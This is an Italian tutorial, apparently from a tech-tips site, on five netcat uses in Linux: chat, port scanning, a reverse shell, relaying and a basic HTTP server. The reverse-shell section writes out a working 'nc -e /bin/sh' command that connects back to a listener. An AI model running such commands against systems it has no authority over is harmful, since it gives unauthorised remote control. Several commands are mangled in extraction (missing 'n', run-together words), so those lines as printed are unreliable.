Tecnologie spiegate in parole semplici

5 Utilizzi Semplici e Facili per Netcat in Linux

Una fotografia di un uomo che ispeziona un cavo UTP su un rack di server.

Netcat è un potente strumento da riga di comando per la rete in Linux che può inviare e ascoltare pacchetti TCP e UDP. A differenza di altri strumenti di rete, netcat è estremamente basilare. Tuttavia, la sua semplicità gli consente di eseguire quasi qualsiasi tipo di attività su una rete.

Questo articolo ti mostrerà 5 semplici attività di rete che puoi fare con netcat. Inoltre, questo articolo evidenzierà anche cosa rende netcat speciale e perché dovresti includerlo nel tuo toolkit Linux.

Indice dei Contenuti

  • Come Funziona Netcat e Perché Usarlo?
    1. Sessione di Chat Peer to Peer
    1. Scanner di Porte di Base
    1. Reverse Shell
    1. Relay di Pacchetti di Base
    1. Server HTTP di Base
  • Domande Frequenti

Come Funziona Netcat e Perché Usarlo?

Netcat è un’utilità di base che può inviare e ricevere pacchetti di rete. È stato rilasciato per la prima volta nel 1995 da un programmatore pseudonimo chiamato Hobbit. Da allora, netcat è diventato una parte importante di ogni distribuzione Linux.

Alla sua base, netcat funziona inviando richieste di rete da un host Linux a un altro. Questa richiesta di rete può contenere qualsiasi tipo di dato e puoi inviarla su qualsiasi porta.

Un terminale che mostra un semplice trasferimento di testo utilizzando netcat.

Questo approccio significa che netcat può creare qualsiasi tipo di connessione di rete possibile. Ad esempio, il programma può creare connessioni TCP dirette che puoi utilizzare per trasferire file o creare sessioni di reverse shell.

Un desktop che mostra un semplice trasferimento di file tra due host Linux utilizzando netcat.

1. Sessione di Chat Peer to Peer

Uno degli usi più basilari per netcat è una semplice sessione di chat peer to peer tra due macchine Linux. Questo è un metodo di comunicazione che non si basa su alcun server di terze parti per inviare e ricevere informazioni.

  1. Affinché questo funzioni, devi aprire una porta tra 49152 e 65536 sulla tua macchina locale. Qui un host remoto potrà connettersi e inviare informazioni arbitrarie alla tua macchina.
sudo ufw allow 50000
  1. Devi anche aprire una porta diversa sull’host remoto affinché la tua macchina possa inviare informazioni verso di essa:
sudo ufw allow 50001
  1. Esegui netcat sulla tua macchina con i seguenti argomenti:
nc -lp50000

Questo aprirà una sessione netcat che ascolta attivamente i dati sulla porta 50000.

  1. L’host remoto può ora inviare qualsiasi dato di testo verso la tua macchina locale. Ad esempio, il seguente comando invierà l’input standard del sistema a una macchina remota.
cat - | nc 192.168.122.136 50000

Un terminale che mostra il prompt di input standard per una chat netcat di base.

  1. Per rispondere al messaggio, l’host remoto deve anche eseguire un demone in ascolto:
nc -lp50001
  1. Ora puoi anche inviare un messaggio dalla macchina locale all’host remoto:
cat - | nc 192.168.122.177 50001

Un terminale che mostra due terminali virtuali per una chat netcat full duplex.

2. Scanner di Porte di Base

Uno scanner di porte è un’utilità semplice che verifica se un insieme di porte su una macchina è accessibile da un host remoto. Questo è molto utile nei casi in cui non sei sicuro se il tuo sistema abbia le porte appropriate aperte.

Per controllare una singola porta, puoi eseguire nc -v seguito dall’indirizzo IP e dalla porta che desideri controllare:

c -v 192.168.122.177 80

Un terminale che mostra una scansione di porta di base per la porta 80.

Puoi anche fornire un intervallo di numeri in cui netcat controllerà sequenzialmente ciascun numero di porta all’interno di quell’intervallo. Ad esempio, eseguendo il seguente comando verranno scansionate tutte le porte “ben note” aperte:

c -v 192.168.122.177 1-1024

Un terminale che mostra una scansione bulk per le porte

Uno degli svantaggi della query delle porte è che genera traffico di rete non necessario. Questo può essere un problema se stai testando un ampio intervallo di porte in una piccola rete domestica.

Per risolvere questo problema, abilita la modalità “Zero I/O” di netcat che non crea alcuna attività di rete sull’host remoto:

c -zv 192.168.122.177 1-1024

Un terminale che mostra una scansione bulk zero IO con netcat.

FYI: Scopri come puoi utilizzare nmap anche senza sudo per raccogliere informazioni sulle macchine nella tua rete locale.

3. Reverse Shell

Le reverse shell sono il pane e il burro del penetration testing in Linux. Queste sono istanze di shell remota che ti consentono di controllare un sistema anche senza porte in entrata aperte. Questo rende le reverse shell utili se hai bisogno di accedere a una macchina che non ha accesso SSH.

  1. Per creare una reverse shell, devi aprire un demone in ascolto sulla tua macchina locale:
c -lp50000
  1. Avvia una connessione netcat sulla tua macchina remota. In questo caso, devi anche passare l’ambiente shell della macchina remota:
c -e/bin/sh 192.168.122.136 50000

Nota: Il comando sopra funzionerà solo su distribuzioni non Ubuntu. Per farlo su Ubuntu devi installare il pacchetto “netcat-traditional” e sostituire “nc” con “nc.traditional.”

  1. Torna alla tua macchina locale ed esegui un comando shell. Ad esempio, eseguendo ls verrà stampato il directory corrente dell’utente remoto.
ls-la

Un terminale che mostra l'output di una reverse shell riuscita.

  1. Per terminare la sessione di reverse shell, puoi premere Ctrl + C sul demone in ascolto della tua macchina locale.

Un terminale che mostra la chiusura della reverse shell nella macchina locale.

Buono a sapersi: Scopri come puoi utilizzare efficacemente la tua reverse shell imparando le basi della programmazione shell.

4. Relay di Pacchetti di Base

Oltre a leggere e scrivere direttamente su uno stream di rete, puoi anche utilizzare netcat per reindirizzare una connessione in arrivo a qualsiasi porta in uscita. Questo funziona concatenando più sessioni di ascolto e client netcat utilizzando pipe UNIX.

  1. Crea una sessione netcat che ascolta sulla porta 50000. Questa servirà come porta in uscita per il tuo relay di base:
c -lv localhost 50000
  1. Apri un nuovo terminale ed esegui il seguente comando:
c -lv localhost 50001 | nc localhost 50000

Facendo questo si creerà un nuovo demone in ascolto sulla porta 50001 e reindirizzerà automaticamente qualsiasi pacchetto su questa porta alla porta 50000.

Un terminale che mostra la connessione di passaggio tra due porte.

  1. Ora puoi inviare dati alla tua porta in arrivo e netcat reindirizzerà automaticamente la sua uscita alla tua porta in uscita.
echo"MakeTechEasier"| nc localhost 50001

Un terminale che mostra un relay di pacchetti di base in azione.

  1. Oltre alle porte locali, puoi anche utilizzare questa funzione per reindirizzare qualsiasi traffico di rete a un’altra macchina. Ad esempio, il seguente codice invia dati sulla porta 50000 alla stessa porta su un sistema diverso:
c -lv localhost 50000| nc 192.168.122.177 50000

Un terminale che mostra un relay di pacchetti di base tra due host.

Nota: Affinché questo funzioni, dovrai eseguire più processi demone e non cripta alcun dato che passa attraverso.

5. Server HTTP di Base

Impostare un server HTTP può essere un processo complesso anche se desideri solo servire una singola pagina. In questo senso, netcat può anche fungere da semplice server web statico che puoi avviare in Linux senza installare strumenti aggiuntivi.

  1. Crea un file di risposta HTTP di base. Il seguente frammento di codice visualizza una pagina web con un messaggio semplice:
HTTP/1.1 200 OK  
Content-Type: text/html; charset=UTF-8  
Server: netcat!  
  
  
  
# Ciao MakeTechEasier!
  1. Salvalo come “index.http” nella tua directory home.

Un terminale che mostra la struttura di una semplice risposta HTTP.

  1. Esegui il seguente comando:
whiletrue; do{echo-e'cat /home/$USER/index.http; } | nc -lv localhost 8080; done

Un terminale che mostra un semplice server web netcat in esecuzione.

Ora hai un server web funzionante. Puoi visitare la tua pagina web aprendo un browser web e andando su http://localhost:8080.

Uno screenshot che mostra un server web netcat funzionante che serve una pagina web.

  1. Premi Ctrl + C nel terminale per uscire dall’attuale sessione del server web.

Un terminale che mostra il processo di chiusura per il server web netcat di base.

Nota: Come puoi vedere, questo è solo un server HTTP molto basilare e non è sicuro. Se stai eseguendo il tuo server, dovresti seguire questi suggerimenti per proteggere il tuo server.

Buono a sapersi: Scopri come gestire i tuoi file in modo efficace utilizzando sed per manipolare flussi di testo.

Domande Frequenti

Non riesco a connettermi a una macchina remota utilizzando netcat.

Questo problema è molto probabilmente dovuto a una porta del firewall bloccata sulla macchina remota. Devi assicurarti che la porta che stai utilizzando sulla tua macchina sia aperta per le connessioni in entrata e in uscita. Ad esempio, devi eseguire sudo ufw allow 49999 se desideri utilizzare la porta 49999 sulla macchina remota.

È possibile connettersi a qualsiasi host utilizzando netcat?

No. Anche se netcat può leggere e scrivere su qualsiasi stream di rete arbitrario, non può connettersi a una macchina che non è scoperta dalla rete del tuo sistema. Queste includono reti private che non hanno abilitato il port forwarding e sistemi air-gap che non hanno accesso alla rete.

È possibile falsificare una connessione in netcat?

No. Questo perché netcat può solo inviare e ricevere pacchetti da un’interfaccia di rete valida. Tuttavia, puoi cambiare da dove proviene quel particolare pacchetto se hai più interfacce di rete.

Ad esempio, puoi eseguire nc -l -s 10.0.0.2 -p 50000 per dire a netcat di inviare esplicitamente pacchetti utilizzando l’interfaccia che ha l’indirizzo IP “10.0.0.2.”

Crediti immagine: ThisisEngineering RAEng tramite Unsplash. Tutte le modifiche e gli screenshot di Ramces Red.

Contenuto

  1. Come Funziona Netcat e Perché Usarlo?
  2. 1. Sessione di Chat Peer to Peer
  3. 2. Scanner di Porte di Base
  4. 3. Reverse Shell
  5. 4. Relay di Pacchetti di Base
  6. 5. Server HTTP di Base
  7. Domande Frequenti
  8. Non riesco a connettermi a una macchina remota utilizzando netcat.
  9. È possibile connettersi a qualsiasi host utilizzando netcat?
  10. È possibile falsificare una connessione in netcat?
Ello-dashboardprofile

Ello: Esplorando il Social Network Privato

Bitdefender Non Installato: 3 Soluzioni Facili Che Puoi Usare

Ulteriori informazioni sulle correzioni di Bitdefender

Google elimina Inbox e gli dà sei mesi di vita

rapporti-aspetto-16x9

Comprendere i Rapporti di Aspetto dei Video

Gestore di File con Tag per Organizzare i Tuoi File: Top 5

Correggi wake on LAN non funzionante

Wake On LAN Non Funziona su Windows [Risolto]

easycap-mac-mspacman-console

Utilizzare EasyCAP per acquisire VHS e console su Mac

Google testa una nuova funzionalità di Chrome per l'idoneità all'aggiornamento a Windows 11